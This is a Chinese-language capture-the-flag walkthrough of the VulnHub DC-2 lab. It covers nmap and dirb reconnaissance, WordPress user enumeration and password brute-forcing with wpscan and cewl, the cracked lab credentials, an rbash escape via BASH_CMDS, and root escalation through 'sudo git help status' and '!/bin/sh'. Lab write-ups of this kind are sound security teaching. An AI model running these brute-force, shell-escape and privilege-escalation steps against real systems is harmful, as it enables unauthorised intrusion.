DC-2 通关详解
- 环境搭建:
和DC-1差不多
下载靶场环境
靶场下载地址:
https://www.vulnhub.com/entry/dc-2,311/
二、渗透靶场
1、目标:
我们的目标就是搭建的靶场,靶场IP为:XXX.XXX.XXX.XXX/24
2、信息收集:找到靶机的真实IP
nmap -sP 192.168.XXX.XXX.0/24
3、信息收集:探出端口和服务
nmap -A -p- -v 192.168.XXX.XXX
我们发现开放了80端口,存在web服务,Apache/2.4.10,
和开放了ssh服务,OpenSSH 6.7p1,的7744端口。
4、访问web站点
http//192.168.XXX。XXX
我们会发现访问不了,而且我们输入的ip地址转化为了域名,说明dc-2这个域名解析失败了,我们需要更改hosts文件,添加一个ip域名指向。
修改hosts文件,添加靶机IP到域名dc-2的指向
vim /etc/hosts
添加完成之后,再次访问,就成功了
可以很明显的发现这是一个wordpress的站点
5、发现flag1
在网页下面我们flag
点进入发现是flag1
6、做一个目录扫描
dirb http://dc-2/
像是后台地址
打开后进入到登录页面
7、用户名枚举
Wpscan一些常用语句:
wpscan --url http://dc-2
wpscan --url http://dc-2 --enumerate t 扫描主题
wpscan --url http://dc-2 --enumerate p 扫描插件
wpscan --url http://dc-2 --enumerate u 枚举用户
扫描wordpress版本
wpscan --url http://dc-2
发现wordpress的版本4.7.10
登录页面尝试登录
然后输入用户名密码,提示用户名不存在,似乎可以进行用户名枚举
我们来个用户枚举,再利用枚举到的用户爆破密码
wpscan --url http://dc-2 --enumerate u
枚举出三个用户名
admin jerry tom
8、暴力破解出账号密码
根据flag1可以用暴力破解,我们使用cewl生成字典,
cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt
使用wpscan进行暴力破解
wpscan --url http://dc-2 --passwords dc2.txt
爆破两个账号
jerry/adipiscing
tom/parturient
jerry/adipiscing登录此站点
tom/parturient登陆此站点
9、发现flag2
登录后台之后,我们看到flag2,我用的是jerry的账号
点进去之后看ssh
10、在tom的家目录发现flag3
jerry/adipiscing
tom/parturient
登录ssh
ssh tom@192.168.XXX.XXX -p 7744
在tom账号的家目录 发现flag3
cat用不了,
把查看命令都尝试了一遍 less和vi可以来查看,
查看可以使用的命令
echo $PATH
cd进不去目录 使用ls直接查看目录信息
使用echo来绕过rbash
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*
- jerry的家目录发现flag4
提示信息如下:
用tom用户无权限运行sudo 我们切换到jerry用户
可以看到无需root权限,jerry 可以使用 git
sudo -l
12、提权
查看使用的root权限命令
find / -user root -perm -4000 -print 2>/dev/null
jerry用户也不可能直接sudo su
使用git命令进行提取
sudo git help status
输入!/bin/sh,直接输入就行
提权成功
13.发现final-flag.txt
cd /root
cat final-flag.txt
扫一扫
601
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
